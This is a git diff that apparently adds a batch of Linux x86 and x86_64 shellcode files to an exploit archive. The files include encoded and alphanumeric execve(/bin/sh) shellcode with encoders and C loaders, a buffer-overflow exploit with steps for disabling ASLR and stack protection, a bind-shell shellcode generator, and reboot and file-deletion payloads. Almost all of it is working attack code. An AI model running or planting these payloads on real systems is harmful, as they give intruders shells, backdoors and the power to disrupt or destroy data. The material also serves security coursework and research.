+;        mov bl, 03H
+;
+;        init new socket fd
+;        xor ecx, ecx
+;        mov cl, 3
+;
+;        dup2(socket, stdin)
+;        dup2(socket, stdout)
+;        dup2(socket, stderr)
+;        dup2:
+;            dec cl
+;            xor eax, eax
+;            mov al, 3FH
+;            int 80H
+;            cmp cl, 0FFH
+;            jne dup2
+;
+;        execve:
+;            execve("/bin/sh", "/bin/sh", 0)
+;            xor ecx, ecx
+;            push 0bH
+;            pop eax
+;            cdq
+;            push edx
+;            push "//sh"
+;            push "/bin"
+;            mov ebx, esp
+;            int 80H
\ No newline at end of file
diff --git a/shellcodes/linux/47564.py b/shellcodes/linux/47564.py
new file mode 100755
index 000000000..ea0702ceb
--- /dev/null
+++ b/shellcodes/linux/47564.py
@@ -0,0 +1,133 @@
+# Title: Linux/x86 (NOT|ROT+8 Encoded) execve(/bin/sh) null-free Shellcode (47 bytes)
+# Author: Daniel Ortiz
+# Date: 2019-10-30
+# Tested on: Linux 4.18.0-25-generic #26 Ubuntu
+# Size: 47 bytes
+# SLAE ID: PA-9844
+
+#----------------------- execve ------------------------------------------------#
+
+global _start
+
+section .text
+
+_start:
+
+        xor eax, eax
+        push eax
+
+        ; PUSH //bin/sh (8 bytes) 
+
+        push 0x68732f2f
+        push 0x6e69622f
+        mov ebx, esp
+
+        push eax
+        mov edx, esp
+
+        push ebx
+        mov ecx, esp
+
+        mov al, 11
+        int 0x80
+
+#------------------------ execve shellcode -------------------------------------#
+
+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80"
+
+#----------------------- Python Encoder ----------------------------------------#
+
+#!/usr/bin/python
+
+shellcode = "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80"
+
+encoded = ""
+encoded2 = ""
+
+rot = 8
+
+print 'Encoded shellcode ...'
+
+for x in bytearray(shellcode) :
+        # NOT encoding 
+        y = ~x
+        
+        # ROT 8 encoding
+        h  = (y + rot)%256
+
+        encoded += '\\x'
+        encoded += '%02x' % (h & 0xff)
+
+        encoded2 += '0x'
+        encoded2 += '%02x,' %(h & 0xff)
+
+
+print encoded
+
+print encoded2
+
+print 'Len: %d' % len(bytearray(shellcode))
+
+#---------------------- Assembly Code ------------------------------------------#
+
+
+global _start
+
+section .text
+_start:
+        jmp short call_shellcode
+
+decoder:
+        pop esi
+        xor ecx, ecx
+        mov cl, 25
+
+
+decode:
+
+        sub byte [esi], 8
+        not byte [esi]
+        inc esi
+        loop decode
+
+        jmp short EncodedShellcode
+
+call_shellcode:
+
+        call decoder
+
+        EncodedShellcode: db 0xd6,0x47,0xb7,0x9f,0xd8,0xd8,0x94,0x9f,0x9f,0xd8,0xa5,0x9e,0x99,0x7e,0x24,0xb7,0x7e,0x25,0xb4,0x7e,0x26,0x57,0xfc,0x3a,0x87
+
+#------------------------- final shellcode ----------------------------------------#
+
+unsigned char buf[] = 
+
+
+"\xeb\x0f\x5e\x31\xc0\xb0\x19\x80\x2e\x08\xfe"
+"\xc8\x74\x08\x46\xeb\xf6\xe8\xec\xff\xff\xff"
+"\x39\xc8\x58\x70\x37\x37\x7b\x70\x70\x37\x6a"
+"\x71\x76\x91\xeb\x58\x91\xea\x5b\x91\xe9\xb8"
+"\x13\x88";
+
+#------------------------- C wrapper --------------------------------------------------# 
+
+#include<stdio.h>
+#include<string.h>
+
+unsigned char code[] = \
+
+"\xeb\x0f\x5e\x31\xc0\xb0\x19\x80\x2e\x08\xfe"
+"\xc8\x74\x08\x46\xeb\xf6\xe8\xec\xff\xff\xff"
+"\x39\xc8\x58\x70\x37\x37\x7b\x70\x70\x37\x6a"
+"\x71\x76\x91\xeb\x58\x91\xea\x5b\x91\xe9\xb8"
+"\x13\x88";
+
+
+int main()
+{
+
+        printf("Shellcode Length:  %d\n", strlen(code));
+        int (*ret)() = (int(*)())code;
+        ret();
+
+}
\ No newline at end of file
diff --git a/shellcodes/linux/47877.c b/shellcodes/linux/47877.c
new file mode 100644
index 000000000..5bfdd9cf0
--- /dev/null
+++ b/shellcodes/linux/47877.c
@@ -0,0 +1,109 @@
+# Title: Linux/x86 - Execve() Alphanumeric Shellcode (66 bytes)
+# Date: 2019-12-31
+# Shellcode Author: bolonobolo
+# Tested on: Linux x86
+
+######################## execve.asm ###############################
+global _start			
+
+section .text
+_start:
+
+       ; int 0x80 ------------
+       push 0x30
+       pop eax
+       xor al, 0x30
+       push eax
+       pop edx
+       dec eax
+       xor ax, 0x4f73
+       xor ax, 0x3041
+       push eax
+       push edx
+       pop eax
+       ;----------------------
+       push edx
+       push 0x68735858
+       pop eax
+       xor ax, 0x7777
+       push eax
+       push 0x30
+       pop eax
+       xor al, 0x30
+       xor eax, 0x6e696230
+       dec eax
+       push eax
+
+       ; pushad/popad to place /bin/sh in EBX register
+       push esp
+       pop eax
+       push edx
+       push ecx
+       push ebx
+       push eax
+       push esp
+       push ebp
+       push esi
+       push edi
+       popad
+       push eax
+       pop ecx
+       push ebx
+
+       xor al, 0x4a
+       xor al, 0x41
+
+######################## ASCII string ##########################
+
+j0X40PZHf5sOf5A0PRXRj0X40hXXshXf5wwPj0X4050binHPTXRQSPTUVWaPYS4J4A
+
+########################## bof.c ####################
+
+#include <stdlib.h>
+#include <stdio.h>
+#include <string.h>
+
+  int main(int argc, char *argv[]){
+    char buffer[128];
+    strcpy(buffer,  argv[1]);
+    return 0;
+  }
+
+
+When you test it on new kernels remember to disable the
+randomize_va_space and to compile the C program with execstack enabled
+and the stack protector disabled
+
+# bash -c 'echo "kernel.randomize_va_space = 0" >> /etc/sysctl.conf'
+# sysctl -p
+# gcc -z execstack -fno-stack-protector -mpreferred-stack-boundary=2 -g
+bof.c -o bof
+
+
+###################################################################
+
+./bof `perl -e 'print "\x90"x48 .
+"j0X40PZHf5sOf5A0PRXRj0X40hXXshXf5wwPj0X4050binHPTXRQSPTUVWaPYS4J4A" .
+"D"x16 . "\xff\xe4" . "\x79\xf7\xff\xbf"'`
+
+The \x79\xf7\xff\xbf may change, you must find yourself an address in
+the NOP befor the shellcode
+
+#################### alpha.py ############################
+
+#!/usr/bin/python
+import os
+
+print "[*] Loading NOP"
+z = "\x90"*48
+print "[*] Loading alphanumeric"
+z += "j0X40PZHf5sOf5A0PRXRj0X40hXXshXf5wwPj0X4050binHPTXRQSPTUVWaPYS4J4A"
+print "[*] Loading syscall"
+z += "D"*16
+print "[*] Loading JMP and landing address"
+z += "\xff\xe4\x79\xf7\xff\xbf"
+print "[*] Popping the shell..."
+os.system("./bof " + z)
+
+
+##################################################################
\ No newline at end of file
diff --git a/shellcodes/linux/47890.c b/shellcodes/linux/47890.c
new file mode 100644
index 000000000..d35e5c861
--- /dev/null
+++ b/shellcodes/linux/47890.c
@@ -0,0 +1,219 @@
+# Title: Linux/x86 - Random Bytes Encoder + XOR/SUB/NOT/ROR execve(/bin/sh) Shellcode (114)
+# Author: Xenofon Vassilakopoulos 
+# Date: 2020-01-01
+# Tested on: Linux kali 5.3.0-kali2-686-pae #1 SMP Debian 5.3.9-3kali1 (2019-11-20) i686 GNU/Linux
+# Architecture: i686 GNU/Linux
+# Shellcode Length: 114 bytes
+# SLAE-ID: SLAE - 1314 
+# Description: Linux/x86 encoding of random bytes + XOR/SUB/NOT/ROR and also decodes ROL/NOT/ADD/XOR execve(/bin/sh) shellcode
+
+
+---------------------- execve-stack /bin/sh --------------------------------
+
+global _start
+section .text
+_start:
+        xor eax, eax
+        push eax
+        push 0x68732f2f
+        push 0x6e69622f
+        mov ebx, esp
+        push eax
+        mov edx, esp
+        push ebx
+        mov ecx, esp
+        mov al, 11
+        int 0x80
+
+----------------------- Original Shellcode ---------------------------------
+
+
+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80"
+
+		
+----------- Decoder ROL/NOT/ADD/XOR + Removing inserted random bytes -------
+
+
+global _start
+
+section .text
+
+_start:
+        jmp short call_shellcode
+decoder:
+        pop esi                 
+        push esi                
+        xor ebx, ebx            
+        xor ecx, ecx            
+        xor edx, edx            
+        mov dl, len        
+rotate:
+        ;; apply the decoding scheme
+        rol byte [esi], 4       
+        not byte [esi]         
+        add byte [esi], 2       
+        xor byte [esi], 0x2c    
+        inc esi               
+        cmp cl, dl           
+        je  init               
+        inc cl              
+        jmp short rotate
+
+init:
+        pop esi               
+        lea edi, [esi +1]      
+        xor eax, eax           
+        mov al, 1             
+        xor ecx, ecx         
+  
+decode:       
+        cmp cl, dl                      
+        je EncodedShellcode          
+        mov bl, byte [esi + eax + 1]   
+        mov byte [edi], bl              
+        inc edi                         
+        inc cl                          
+        add al, 2                       
+        jmp short decode       
+         
+call_shellcode:
+        call decoder
+        EncodedShellcode: db 0x4e,0xc1,0x51,0x2f,0x58,0x3c,0xdb,0xac,0xef,0x82,0xef,0x1c,0x2a,0xd9,0xdb,0x90,0xdb,0x6b,0xef,0x61,0x3b,0x1c,0xcb,0x24,0xfb,0xd6,0xc5,0x50,0x23,0xfa,0x58,0x9c,0xc5,0xb1,0x33,0x97,0x28,0x31,0xc5,0xaa,0x43,0xf9,0x56,0xf4,0xad,0xc2,0x02,0x16,0x55,0xe3
+        len equ $-EncodedShellcode
+
+
+---------  Encoder - Random Bytes Insertion + XOR/SUB/NOT/ROR  ---------------
+
+xenofon@slae:~/Documents/Assignment4$ gcc -o encoder encoder.c
+xenofon@slae:~/Documents/Assignment4$ ./encoder
+
+
+Shellcode:
+
+\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80
+
+Shellcode Length 25
+
+
+Decoded Shellcode:
+
+0x31,0xc0,0x50,0x68,0x2f,0x2f,0x73,0x68,0x68,0x2f,0x62,0x69,0x6e,0x89,0xe3,0x50,0x89,0xe2,0x53,0x89,0xe1,0xb0,0x0b,0xcd,0x80,
+
+Encoded shellcode
+
+0x4e,0x70,0x51,0x61,0x58,0xf4,0xdb,0xe1,0xef,0xef,0xef,0x6a,0x2a,0x41,0xdb,0x4c,0xdb,0x20,0xef,0xbf,0x3b,0x78,0xcb,0x77,0xfb,0x57,0xc5,0x90,0x23,0x62,0x58,0xf0,0xc5,0xe1,0x33,0xe5,0x28,0x9d,0xc5,0x3d,0x43,0xf6,0x56,0x29,0xad,0x29,0x02,0x57,0x55,0x34,
+
+Encoded Shellcode Length 50
+
+
+xenofon@slae:~/Documents/Assignment4$ cat encoder.c
+
+#include <stdio.h>
+#include <stdlib.h>
+#include <time.h>
+#include <string.h>
+#include <unistd.h>
+#include <fcntl.h>
+
+#define DEC 0x2 // the value that will be used to substract every byte
+#define XORVAL 0x2c // the value that will be used to xor with every byte
+
+// execve stack shellcode /bin/sh
+unsigned char shellcode[] = \
+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80";
+
+void main()
+{
+        int rot = 4; //right rotation 4 bits
+        printf("\n\nShellcode:\n\n");
+        int o;
+        for (o=0; o<strlen(shellcode); o++) {
+                printf("\\x%02x", shellcode[o]);
+        }
+        printf("\n\nShellcode Length %d\n",sizeof(shellcode)-1);
+        printf("\n\nDecoded Shellcode:\n\n");
+        o=0;
+        for (o; o<strlen(shellcode); o++) {
+                printf("0x%02x,", shellcode[o]);
+        }
+        printf("\n");
+        int i;
+        unsigned char *buffer = (char*)malloc(sizeof(shellcode)*2);
+        srand((unsigned int)time(NULL));
+        unsigned char *shellcode2=(char*)malloc(sizeof(shellcode)*2);
+        // placeholder to copy the random bytes using rand
+        unsigned char shellcode3[] = "\xbb";
+        int l = 0;
+        int k = 0;
+        int j;
+        // random byte insertion into even location
+        for (i=0; i<(strlen(shellcode)*2); i++) {
+                // generate random bytes
+                buffer[i] = rand() & 0xff;
+                memcpy(&shellcode3[0],(unsigned char*)&buffer[i],sizeof(buffer[i]));
+                k = i % 2;
+                if (k == 0)
+                {
+                        shellcode2[i] = shellcode[l];
+                        l++;
+                }
+                else
+                {
+                        shellcode2[i] = shellcode3[0];
+                }
+        }
+        // apply the encoding scheme
+        for (i=0; i<strlen(shellcode2); i++) {
+				// XOR every byte with 0x2c
+                shellcode2[i] = shellcode2[i] ^ XORVAL;
+                // subtract every byte by 2
+                shellcode2[i] = shellcode2[i] - DEC;
+                // one's complement negation
+                shellcode2[i] = ~shellcode2[i];
+                // perform the ROR method 
+                shellcode2[i] = (shellcode2[i] << rot) | (shellcode2[i] >> sizeof(shellcode2[i])*(8-rot));
+        }
+        // print encoded shellcode
+        printf("\nEncoded shellcode\n\n");
+        i=0;
+        for (i; i<strlen(shellcode2); i++) {
+                printf("0x%02x,", shellcode2[i]);
+        }
+        printf("\n\nEncoded Shellcode Length %d\n",strlen(shellcode2));
+        free(shellcode2);
+        free(buffer);
+        printf("\n\n");
+ }
+
+
+-----------------------------------  Shellcode -------------------------------------
+
+xenofon@slae:~/Documents/Assignment4$ gcc -fno-stack-protector -z execstack -o shellcode shellcode.c
+xenofon@slae:~/Documents/Assignment4$ ./shellcode
+Shellcode Length:  117
+$ whoami
+xenofon
+
+
+xenofon@slae:~/Documents/Assignment4$ cat shellcode.c
+#include <stdio.h>
+#include <string.h>
+
+unsigned char code[] = \
+
+        "\xeb\x3c\x5e\x56\x31\xdb\x31\xc9\x31\xd2\xb2\x32\xc0\x06"
+        "\x04\xf6\x16\x80\x06\x02\x80\x36\x2c\x46\x38\xd1\x74\x04"
+        "\xfe\xc1\xeb\xec\x5e\x8d\x7e\x01\x31\xc0\xb0\x01\x31\xc9"
+        "\x8a\x1c\x06\x38\xd1\x74\x12\x8a\x5c\x06\x01\x88\x1f\x47"
+        "\xfe\xc1\x04\x02\xeb\xec\xe8\xbf\xff\xff\xff\x4e\xd1\x51"
+        "\xb4\x58\x37\xdb\x55\xef\x3d\xef\xbd\x2a\x59\xdb\x81\xdb"
+        "\x56\xef\xae\x3b\x1a\xcb\xfa\xfb\x43\xc5\x49\x23\x12\x58"
+        "\xd2\xc5\xee\x33\x82\x28\x49\xc5\xc3\x43\x30\x56\xcb\xad"
+        "\xe1\x02\x8b\x55\x84";
+
+int main()
+{
+        printf("Shellcode Length:  %d\n", strlen(code));
+        int (*ret)() = (int(*)())code;
+        ret();
+}
\ No newline at end of file
diff --git a/shellcodes/linux/48032.py b/shellcodes/linux/48032.py
new file mode 100755
index 000000000..1980cc0b8
--- /dev/null
+++ b/shellcodes/linux/48032.py
@@ -0,0 +1,147 @@
+# Title: Linux/x86 - Bind Shell Generator Shellcode (114 bytes)
+# Author: Bobby Cooke
+# Date: 2020-01-29
+# Tested On: Ubuntu 3.13.0-32-generic #57~precise1-Ubuntu i386 
+
+#!/usr/bin/python
+
+# Take users TCP port as input
+port = raw_input("Enter TCP Port Number: ")
+# Convert input string to an integer
+deciPort = int(port)
+# Format the integer to Hex Integer
+hexPort = "{:02x}".format(deciPort)
+#print "Hex value of Decimal Number:",hexPort
+# Check the length of the output hex string
+hexStrLen = len(hexPort)
+# Check if the hex string is even or odd with modulus 2
+oddEven = hexStrLen % 2
+# if it returns 1 then it's odd. We need to add a leading 0
+if oddEven == 1:
+    hexPort = "0" + hexPort
+# converts the  port number into the correct hex format
+tcpPort = "\\x".join(hexPort[i:i+2] for i in range(0,len(hexPort), 2))
+print "Your TCP Port in Hex is:","\\x"+tcpPort
+nullCheck = deciPort % 256
+if nullCheck == 0 :
+    print "Your TCP Port contains a Null 0x00."
+    print "Try again with a different Port Number."
+    exit(0)
+
+# 1. Create a new Socket
+# <socketcall>  ipv4Socket = socket( AF_INET, SOCK_STREAM, 0 );
+#   EAX=0x66                  EBX     ECX[0]   ECX[1]    ECX[2]
+scPart1 = "\x31\xc0"  # xor eax, eax; This sets the EAX Register to NULL (all zeros).
+scPart1 += "\xb0\x66" # mov al, 0x66; EAX is now 0x00000066 = SYSCALL 102 - socketcall 
+scPart1 += "\x31\xdb" # xor ebx, ebx; This sets the EBX Register to NULL (all zeros).
+scPart1 += "\xb3\x01" # mov bl, 0x1; EBX is set to create a socket
+scPart1 += "\x31\xc9" # xor ecx, ecx; This sets the ECX Register to NULL (all zeros). 
+scPart1 += "\x51"     # push ecx; ECX[2]. ECX is NULL
+scPart1 += "\x53"     # push ebx; ECX[1]. EBX already has the value we need for ECX[1]
+scPart1 += "\x6a\x02" # push dword 0x2 ; ECX[0]. Push the value 2 onto the stack, needed for AF_INET.  
+scPart1 += "\x89\xe1" # mov ecx, esp ; ECX now holds the pointer to the arg array
+scPart1 += "\xcd\x80" # int 0x80 ; System Call Interrupt 0x80 - Executes socket().
+scPart1 += "\x96"     # xchg esi, eax ; After the SYSCAL, sockfd is stored in the EAX Register, save in ESI
+
+# 2. Create TCP-IP Address and Bind the Address to the Socket
+# struct sockaddr_in ipSocketAddr = {
+# .sin_family = AF_INET, .sin_port = htons(4444), .sin_addr.s_addr = INADDR_ANY};
+#       ARG[0]               ARG[1]                          ARG[2]
+#<socketcall>   bind(ipv4Socket, (struct sockaddr*) &ipSocketAddr, sizeof(ipSocketAddr));
+#  EAX=0x66      EBX   ECX[0]                   ECX[1]                   ECX[2]
+scPart1 += "\x31\xc0" # xor eax, eax      ; This sets the EAX Register to NULL (all zeros).
+scPart1 += "\xb0\x66" # mov al, 0x66      ; EAX is now 0x00000066 = SYSCALL 102 - socketcall 
+scPart1 += "\x31\xdb" # xor ebx, ebx      ; This sets the EBX Register to NULL (all zeros). 
+scPart1 += "\xb3\x02" # mov bl, 0x2       ; EBX is set to create a socket
+scPart1 += "\x31\xd2" # xor edx, edx      ; This sets the EDX Register to NULL (all zeros).
+scPart1 += "\x52"     # push edx          ; ARG[2]. EDX is NULL, the value needed for INADDR_ANY.
+scPart1 += "\x66\x68" # push word 0x??    ; ; ARG[1]. This is for the TCP Port #
+#tcpPort = "\x11\x5c" # TCP Port 4444 = 0x5c11
+scPart2 = "\x66\x53"  # push bx           ; ARG[0]. Push the value 2 onto the stack, needed for AF_INET.
+scPart2 += "\x31\xc9"  # xor ecx, ecx      ; This sets the EAX Register to NULL (all zeros).
+scPart2 += "\x89\xe1"  # mov ecx, esp      ; Save the memory location of ARG[0] into the EDX Register.
+scPart2 += "\x6a\x10"  # push 0x10         ; ECX[2]. Our Struct of ARG's is now 16 bytes long (0x10 in Hex).
+scPart2 += "\x51"      # push ecx          ; ECX[1]. The pointer to the beginning of the struct we saved
+scPart2 += "\x56"      # push esi          ; ECX[0]. This is the value we saved from creating the Socket earlier.
+scPart2 += "\x89\xe1"  # mov ecx, esp      ; Now we need to point ECX to the top of the loaded stack.
+scPart2 += "\xcd\x80"  # int 0x80          ; System Call Interrupt 0x80
+
+# 4. Listen for incoming connections on TCP-IP Socket.
+# <socketcall>   listen( ipv4Socket, 0 );
+#   EAX=0x66      EBX      ECX[0]   ECX[1]
+scPart2 += "\x31\xc0" # xor eax, eax     ; This sets the EAX Register to NULL (all zeros).
+scPart2 += "\xb0\x66" # mov al, 0x66     ; EAX is now 0x00000066 = SYSCALL 102 - socketcall
+scPart2 += "\x31\xdb" # xor ebx, ebx     ; This sets the EBX Register to NULL (all zeros).
+scPart2 += "\xb3\x04" # mov bl, 0x4      ; EBX is set to listen().
+scPart2 += "\x31\xc9" # xor ecx, ecx     ; This sets the ECX Register to NULL (all zeros).
+scPart2 += "\x51"     # push ecx         ; ECX[1]. Push the value 0x0 to the stack.
+scPart2 += "\x56"     # push esi         ; ECX[0]. This is the value we saved from creating the Socket earlier.
+scPart2 += "\x89\xe1" # mov ecx, esp     ; Point ECX to the top of the stack.
+scPart2 += "\xcd\x80" # int 0x80         ; Executes listen(). Allowing us to handle incoming TCP-IP Connections.
+
+# 5. Accept the incoming connection, and create a connected session.
+# <socketcall>   clientSocket = accept( ipv4Socket, NULL, NULL );
+#   EAX=0x66                     EBX     ECX[0]    ECX[1] ECX[2]
+scPart2 += "\x31\xc0" # xor eax, eax     ; This sets the EAX Register to NULL (all zeros).
+scPart2 += "\xb0\x66" # mov al, 0x66     ; EAX is now 0x00000066 = SYSCALL 102 - socketcall
+scPart2 += "\x31\xdb" # xor ebx, ebx     ; This sets the EBX Register to NULL (all zeros).
+scPart2 += "\xb3\x05" # mov bl, 0x5      ; EBX is set to accept().
+scPart2 += "\x31\xc9" # xor ecx, ecx     ; This sets the ECX Register to NULL (all zeros).
+scPart2 += "\x51" # push ecx         ; ECX[2]. Push the value 0x0 to the stack.
+scPart2 += "\x51" # push ecx         ; ECX[1]. Push the value 0x0 to the stack.
+scPart2 += "\x56" # push esi         ; ECX[0]. This is the value we saved from creating the Socket earlier.
+scPart2 += "\x89\xe1" # mov ecx, esp     ; Point ECX to the top of the stack.
+scPart2 += "\xcd\x80" # int 0x80         ; System Call Interrupt 0x80
+scPart2 += "\x93" # xchg ebx, eax    ; The created clientSocket is stored in EAX after receiving a connection.
+
+# 6. Transfer STDIN, STDOUT, STDERR to the connected Socket.
+# dup2( clientSocket, 0 ); // STDIN
+# dup2( clientSocket, 1 ); // STDOUT
+# dup2( clientSocket, 2 ); // STDERR
+# EAX       EBX      ECX
+scPart2 += "\x31\xc0" # xor eax, eax   ; This sets the EAX Register to NULL (all zeros).
+scPart2 += "\x31\xc9" # xor ecx, ecx   ; This sets the ECX Register to NULL (all zeros).
+scPart2 += "\xb1\x02" # mov cl, 0x2    ; This sets the loop counter, and
+                      #                ;  will also be the value of "int newfd" for the 3 dup2 SYSCAL's.
+#dup2Loop:                             ; Procedure label for the dup2 Loop.
+scPart2 += "\xb0\x3f" # mov al, 0x3f   ; EAX is now 0x0000003F = SYSCALL 63 - dup2
+scPart2 += "\xcd\x80" # int 0x80       ; System Call Interrupt 0x80 - Executes accept().
+                      #                ;   Allowing us to create connected Sockets.
+scPart2 += "\x49"     # dec ecx        ; Decrements ECX by 1
+scPart2 += "\x79\xf9" # jns dup2Loop /jns short -5  ; Jump back to the dup2Loop Procedure until ECX equals 0.
+
+# 7. Spawn a "/bin/sh" shell for the client, in the connected session.
+# execve("/bin//sh", NULL, NULL);
+#  EAX      EBX       ECX   EDX
+scPart2 += "\x52"                 # push edx       ; Push NULL to terminate the string.
+scPart2 += "\x68\x2f\x2f\x73\x68" # push 0x68732f2f  ; "hs//" - Needs to be 4 bytes to fit on stack properly
+scPart2 += "\x68\x2f\x62\x69\x6e" # push 0x6e69622f  ; "nib/" - This is "/bin//sh" backwards.
+scPart2 += "\x89\xe3"             # mov ebx, esp     ; point ebx to stack where /bin//sh +\x00 is located
+scPart2 += "\x89\xd1"             # mov ecx, edx     ; NULL
+scPart2 += "\xb0\x0b"             # mov al, 0xb      ; execve System Call Number - 11
+scPart2 += "\xcd\x80"             # int 0x80         ; execute execve with system call interrupt
+
+# Initiate the Shellcode variable we will output
+shellcode = ""
+
+# Add the first part of the tcp bind shellcode
+for x in bytearray(scPart1) :
+    shellcode += '\\x'
+    shellcode += '%02x' %x
+# Add the user added tcp port to the shellcode
+shellcode += "\\x"+tcpPort
+# Add the second part of the tcp bind shellcode
+for x in bytearray(scPart2) :
+    shellcode += '\\x'
+    shellcode += '%02x' %x
+
+print "Choose your shellcode export format."
+exportFormat = raw_input("[1] = C Format\n[2] = Python Format\n[1]: ")
+if exportFormat == "2" : 
+    formatSC = '"\nshellcode += "'.join(shellcode[i:i+48] for i in range(0,len(shellcode), 48))
+    print "[-----------------------Your-Shellcode------------------------]"
+    print 'shellcode = "'+formatSC+'"'
+else :
+    formatSC = '"\n"'.join(shellcode[i:i+48] for i in range(0,len(shellcode), 48))
+    print "[----------------Your-Shellcode------------------]"
+    print ' unsigned char shellcode[] = \\\n"'+formatSC+'";'
\ No newline at end of file
diff --git a/shellcodes/linux/48243.txt b/shellcodes/linux/48243.txt
new file mode 100644
index 000000000..49fe06290
--- /dev/null
+++ b/shellcodes/linux/48243.txt
@@ -0,0 +1,55 @@
+# Exploit Title: Linux\x86 - 'reboot' polymorphic Shellcode (26 bytes)
+# Purpose: This is a x86 Linux null-free polymorphic shellcode for forcing a reboot.
+# Date: 2020-03-23
+# Author: Upayan a.k.a. slaeryan
+# Contact: upayansaha@icloud.com
+# SLAE: 1525
+# Vendor Homepage: None
+# Software Link: None
+# Tested on: Linux x86
+# CVE: N/A
+
+
+/*
+; Filename: reboot_polymorphic.nasm
+; Author: Upayan a.k.a. slaeryan
+; SLAE: 1525
+; Contact: upayansaha@icloud.com
+; Purpose: This is a x86 Linux null-free polymorphic shellcode for forcing a reboot.
+; Testing: ./reboot_polymorphic
+; Compile with: ./compile.sh reboot_polymorphic
+; Size of shellcode: 26 bytes
+
+global _start			
+
+section .text
+_start:
+	xor eax, eax                ; Clearing the EAX register
+    xor ebx, ebx                ; Clearing the EBX register
+    xor ecx, ecx                ; Clearing the ECX register
+    cdq                         ; Clearing the EDX register
+    mov al, 0x58                ; Loading syscall value = 0x58 for reboot in AL
+    mov ebx, 0xfee1dead         ; Loading magic 1 in EBX
+    mov ecx, 672274793          ; Loading magic 2 in ECX
+    mov edx, 0x1234567          ; Loading cmd val = LINUX_REBOOT_CMD_RESTART in EDX
+    int 0x80                    ; Executing the reboot syscall
+
+*/
+
+
+#include <stdio.h>
+#include <string.h>
+
+unsigned char code[] = \
+"\x31\xc0\x31\xdb\x31\xc9\x99\xb0\x58\xbb\xad\xde\xe1\xfe\xb9\x69\x19\x12\x28\xba\x67\x45\x23\x01\xcd\x80";
+
+void main()
+{
+
+	printf("Shellcode Length:  %d\n", strlen(code));
+
+	int (*ret)() = (int(*)())code;
+
+	ret();
+
+}
\ No newline at end of file
diff --git a/shellcodes/linux_x86-64/46870.c b/shellcodes/linux_x86-64/46870.c
new file mode 100644
index 000000000..11261c99f
--- /dev/null
+++ b/shellcodes/linux_x86-64/46870.c
@@ -0,0 +1,63 @@
+;Title: Linux/x86_64 - delete  
+;Author: Aron Mihaljevic
+;Architecture: Linux x86_64
+;Shellcode Length:  28 bytes
+
+
+This shellcode deletes file declared in "fname"
+
+
+==================ASSEMBLY ========================================
+
+global _start
+
+section .text
+
+_start:
+
+        jmp short _file
+
+
+delete:
+        push 87                             ;sys_unlink
+        pop rax
+        pop rdi                             ;fname
+        syscall
+
+exit:
+        xor rax,        rax
+        mov al,         60                  ;sys_exit
+        syscall
+
+
+_file:
+
+call delete
+fname: db "test.txt"
+
+
+
+=======Generate Shellcode==========================================
+nasm -felf64 delete.nasm -o delete.o 
+ld delete.o -o delete
+
+
+
+========C program ================================================
+//gcc -fno-stack-protector -z execstack delete.c
+
+#include <stdio.h>
+#include <string.h>
+
+char sh[]="\xeb\x0d\x6a\x57\x58\x5f\x0f\x05\x48"
+          "\x31\xc0\xb0\x3c\x0f\x05\xe8\xee\xff"
+          "\xff\xff\x74\x65\x73\x74\x2e\x74\x78\x74";
+
+
+void main(int argc, char **argv)
+{
+        printf("Shellcode Length: %d\n", strlen (sh));
+        int (*func)();
+        func = (int (*)()) sh;
+        (int)(*func)();
+}
\ No newline at end of file
diff --git a/shellcodes/linux_x86-64/46907.c b/shellcodes/linux_x86-64/46907.c
new file mode 100644
index 000000000..548a0770d
--- /dev/null
+++ b/shellcodes/linux_x86-64/46907.c
@@ -0,0 +1,74 @@
+/*
+;Category: Shellcode
+;Title: GNU/Linux x86_64 - execve /bin/sh
+;Author: rajvardhan
+;Date: 23/05/2019
+;Architecture: Linux x86_64
+;Possibly The Smallest And Fully Reliable Shellcode
+
+===========
+Asm Source  
+===========
+
+global _start
+section .text
+_start:
+	xor rsi,rsi
+	push rsi
+	mov rdi,0x68732f2f6e69622f
+	push rdi
+	push rsp
+	pop rdi
+	push 59
+	pop rax
+	cdq
+	syscall
+================================
+Instruction for nasm compliation
+================================
+
+nasm -f elf64 shellcode.asm -o shellcode.o
+ld shellcode.o -o shellcode
+
+===================
+objdump disassembly
+===================
+
+Disassembly of section .text:
+
+0000000000401000 <_start>:
+  401000:	48 31 f6             	xor    %rsi,%rsi
+  401003:	56                   	push   %rsi
+  401004:	48 bf 2f 62 69 6e 2f 	movabs $0x68732f2f6e69622f,%rdi
+  40100b:	2f 73 68 
+  40100e:	57                   	push   %rdi
+  40100f:	54                   	push   %rsp
+  401010:	5f                   	pop    %rdi
+  401011:	6a 3b                	pushq  $0x3b
+  401013:	58                   	pop    %rax
+  401014:	99                   	cltd   
+  401015:	0f 05                	syscall 
+
+==================
+23 Bytes Shellcode
+==================
+
+\x48\x31\xf6\x56\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x57\x54\x5f\x6a\x3b\x58\x99\x0f\x05
+
+======================
+C Compilation And Test
+======================
+
+gcc -fno-stack-protector -z execstack shellcode.c -o shellcode
+
+*/
+
+#include <stdio.h>
+
+unsigned char shellcode[] = \
+"\x48\x31\xf6\x56\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x57\x54\x5f\x6a\x3b\x58\x99\x0f\x05";
+int main()
+{
+    int (*ret)() = (int(*)())shellcode;
+    ret();
+}
\ No newline at end of file
diff --git a/shellcodes/linux_x86-64/46975.c b/shellcodes/linux_x86-64/46975.c
new file mode 100644
index 000000000..101ec9dde
--- /dev/null
+++ b/shellcodes/linux_x86-64/46975.c
@@ -0,0 +1,153 @@
+;Title: Linux/x86_64 - Bind (4444/TCP) Shell (/bin/sh)
+;Author: Aron Mihaljevic
+;Architecture: Linux x86_64
+;Shellcode Length:  131 bytes
+;github = https://github.com/STARRBOY	
